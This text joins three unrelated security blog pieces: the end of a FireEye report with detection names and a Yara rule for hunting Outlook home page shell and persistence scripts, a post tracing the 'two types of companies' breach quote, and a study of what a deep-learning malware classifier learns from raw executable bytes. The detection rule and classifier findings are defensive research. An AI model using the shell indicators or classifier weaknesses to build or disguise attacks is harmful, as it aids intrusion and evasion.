FE_HackTool_OSX_RULER
FE_Trojan_OLE_RULER
HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
{
meta:
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
    strings:
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
    condition:
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
}

Acknowledgements

The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

The Origin of the Quote “There Are Two Types of Companies”

While listening to a webcast this morning, I heard the speaker mention

There are two types of companies: those who have been hacked, and those who don’t yet know they have been hacked.

He credited Cisco CEO John Chambers but didn't provide any source.

That didn't sound right to me. I could think of two possible antecedents. so I did some research. I confirmed my memory and would like to present what I found here.

John Chambers did indeed offer the previous quote, in a January 2015 post for the World Economic Forum titled What does the Internet of Everything mean for security? Unfortunately, neither Mr Chambers nor the person who likely wrote the article for him decided to credit the author of this quote.

Before providing proper credit for this quote, we need to decide what the quote actually says. As noted in this October 2015 article by Frank Johnson titled Are there really only “two kinds of enterprises”?, there are really (at least) two versions of this quote:

A popular meme in the information security industry is, “There are only two types of companies: those that know they’ve been compromised, and those that don’t know.”

And the second is like unto it: “There are only two kinds of companies: those that have been hacked, and those that will be.”

We see that the first is a version of what Mr Chambers said. Let's call that 2-KNOW. The second is different. Let's call that 2-BE.

The first version, 2-KNOW, can be easily traced and credited to Dmitri Alperovitch. He stated this proposition as part of the publicity around his Shady RAT report, written while he worked at McAfee. For example, this 3 August 2011 story by Ars Technica, Operation Shady RAT: five-year hack attack hit 14 countries, quotes Dmitri in the following:

So widespread are the attacks that Dmitri Alperovitch, McAfee Vice President of Threat Research, said that the only companies not at risk are those who have nothing worth taking, and that of the world's biggest firms, there are just two kinds: those that know they've been compromised, and those that still haven't realized they've been compromised.

Dmitri used slightly different language in this popular Vanity Fair article from September 2011, titled Enter the Cyber-Dragon:

Dmitri Alperovitch, who discovered Operation Shady rat, draws a stark lesson: “There are only two types of companies—those that know they’ve been compromised, and those that don’t know. If you have anything that may be valuable to a competitor, you will be targeted, and almost certainly compromised.”

No doubt former FBI Director Mueller read this report (and probably spoke with Dmitri). He delivered a speech at RSA on 1 March 2012 that introduced question 2-BE into the lexicon, plus a little more:

For it is no longer a question of “if,” but “when” and “how often.”

I am convinced that there are only two types of companies: those that have been hacked and those that will be. 

And even they are converging into one category: companies that have been hacked and will be hacked again.  

Here we see Mr Mueller morphing Dmitri's quote, 2-KNOW, into the second, 2-BE. He also introduced a third variant -- "companies that have been hacked and will be hacked again." Let's call this version 2-AGAIN.

The very beginning of Mr Mueller's quote is surely a play on Kevin Mandia's long-term commitment to the inevitability of compromise. However, as far as I could find, Kevin did not use the "two companies" language.

One article that mentions version 2-KNOW and Kevin is this December 2014 Ars Technica article titled “Unprecedented” cyberattack no excuse for Sony breach, pros say. However, the article is merely citing other statements by Kevin along with the aphorism of version 2-KNOW.

Finally, there's a fourth version introduced by Mr Mueller's successor, James Comey, as well! In a 6 October 2014 story, FBI Director: China Has Hacked Every Big US Company Mr Comey said:

Speaking to CBS' 60 Minutes, James Comey had the following to say on Chinese hackers: 

There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese.

Let's call this last variant 2-CHINA.

To summarize, there are four versions of the "two companies" quote:

  • 2-KNOW, credited to Dmitri Alperovitch in 2011, says "There are only two types of companies—those that know they’ve been compromised, and those that don’t know."
  • 2-BE, credited to Robert Mueller in 2012, says "[T]here are only two types of companies: those that have been hacked and those that will be."
  • 2-AGAIN, credited to Robert Mueller in 2012, says "[There are only two types of companies:] companies that have been hacked and will be hacked again."
  • 2-CHINA, credited to James Comey in 2014, says "There are two kinds of big companies in the United States. There are those who've been hacked by the Chinese and those who don't know they've been hacked by the Chinese."
Now you know!


What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.

Highlights

  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.

Background

Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).


Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE files.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition being that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.


Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown in the right side of Figure 3.  Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 are present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section– basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).


Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.


Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts is shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) is lost, and that the classifier treats these as two completely independent features.


Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.


Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.

Summary

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.